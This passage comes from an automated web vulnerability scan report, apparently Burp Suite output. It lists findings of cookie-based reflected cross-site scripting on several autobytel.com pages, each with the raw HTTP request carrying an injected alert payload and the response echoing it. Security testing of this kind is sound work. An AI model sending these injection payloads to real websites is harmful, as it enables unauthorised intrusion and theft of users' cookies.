The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6acbb"%3balert(1)//cf6dd0ed469 was submitted in the BDATALIST cookie. This input was echoed as 6acbb";alert(1)//cf6dd0ed469 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c46acbb"%3balert(1)//cf6dd0ed469; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:28 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38856

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c46acbb";alert(1)//cf6dd0ed469";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "487E3BC3-B6F2-73D5-894DEBA7
...[SNIP]...

4.2011. http://www.autobytel.com/car-dealers.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-dealers.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 713df"%3balert(1)//8f3b278436a was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 713df";alert(1)//8f3b278436a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=713df"%3balert(1)//8f3b278436a; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:03:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:03:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:03:53 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:03:53 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38856

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "713df";alert(1)//8f3b278436a||";

           s.prop14 = "research|selectstate : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|b
...[SNIP]...

4.2012. http://www.autobytel.com/car-financing.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-financing.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e824"%3balert(1)//4d2f4dba527 was submitted in the BDATALIST cookie. This input was echoed as 1e824";alert(1)//4d2f4dba527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c41e824"%3balert(1)//4d2f4dba527; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

4.2013. http://www.autobytel.com/car-financing.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-financing.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56ed0"%3balert(1)//20669fda9de was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 56ed0";alert(1)//20669fda9de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=56ed0"%3balert(1)//20669fda9de; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:52:05 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41454

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
.prop8 = "finins|Any";

           //s.prop9 = "finins|Search Engine Optimization Project|13148";
           s.prop10 = "finins|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "56ed0";alert(1)//20669fda9de||";

           s.prop14 = "car financing page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "finins||||sky|ban|Sear
...[SNIP]...

4.2014. http://www.autobytel.com/car-incentives.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-incentives.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25dbe"%3balert(1)//9b59bff91b9 was submitted in the BDATALIST cookie. This input was echoed as 25dbe";alert(1)//9b59bff91b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c425dbe"%3balert(1)//9b59bff91b9; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:53 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:53 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c425dbe";alert(1)//9b59bff91b9";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "482FAE8E-A4D0-EBBF-3AE875AD
...[SNIP]...

4.2015. http://www.autobytel.com/car-incentives.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-incentives.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f72b"%3balert(1)//b82e025c3dc was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5f72b";alert(1)//b82e025c3dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5f72b"%3balert(1)//b82e025c3dc; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:59 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:49:59 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
.prop7 = "rebates|";

           //s.prop9 = "rebates|Search Engine Optimization Project|13148";
           s.prop10 = "rebates|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5f72b";alert(1)//b82e025c3dc||";

           s.prop14 = "car incentives page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "rebates||||sky|ban|Se
...[SNIP]...

4.2016. http://www.autobytel.com/car-news.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-news.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3a18"%3balert(1)//e56036844aa was submitted in the BDATALIST cookie. This input was echoed as b3a18";alert(1)//e56036844aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b3a18"%3balert(1)//e56036844aa; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b3a18";alert(1)//e56036844aa";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48603924-C61E-B2E2-10A7CDC6
...[SNIP]...

4.2017. http://www.autobytel.com/car-news.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-news.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dcea"%3balert(1)//1c6f78cfa84 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 2dcea";alert(1)//1c6f78cfa84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=2dcea"%3balert(1)//1c6f78cfa84; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "2dcea";alert(1)//1c6f78cfa84||";

           s.prop14 = "car news page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|Search
...[SNIP]...

4.2018. http://www.autobytel.com/car-pictures.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-pictures.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78c44"%3balert(1)//1e7af7a9edd was submitted in the BDATALIST cookie. This input was echoed as 78c44";alert(1)//1e7af7a9edd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c478c44"%3balert(1)//1e7af7a9edd; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43566
Expires: Mon, 24 Jan 2011 23:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:30 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:30 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c478c44";alert(1)//1e7af7a9edd";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "483E67CF-DBEB-149B-E3465F67
...[SNIP]...

4.2019. http://www.autobytel.com/car-pictures.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-pictures.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6c37"%3balert(1)//3474e0c2a81 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as b6c37";alert(1)//3474e0c2a81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=b6c37"%3balert(1)//3474e0c2a81; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43553
Expires: Mon, 24 Jan 2011 23:54:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:12 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "b6c37";alert(1)//3474e0c2a81||";

           s.prop14 = "car pictures page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|
...[SNIP]...

4.2020. http://www.autobytel.com/car-reviews.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-reviews.htm

Issue detail

